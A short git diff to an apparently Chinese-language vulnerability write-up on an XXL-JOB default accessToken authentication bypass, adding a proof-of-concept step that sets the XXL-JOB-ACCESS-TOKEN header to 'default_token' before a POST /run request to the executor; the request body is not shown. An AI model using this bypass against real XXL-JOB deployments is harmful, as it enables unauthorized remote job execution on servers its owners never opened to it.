diff --git a/XXL-JOB默认accessToken身份绕过漏洞.md b/XXL-JOB默认accessToken身份绕过漏洞.md index e8362a7..46d5c59 100644 --- a/XXL-JOB默认accessToken身份绕过漏洞.md +++ b/XXL-JOB默认accessToken身份绕过漏洞.md @@ -7,6 +7,8 @@ ``` ## poc +请求头加上XXL-JOB-ACCESS-TOKEN: default_token + ``` POST /run HTTP/1.1 Host: 127.0.0.1:9999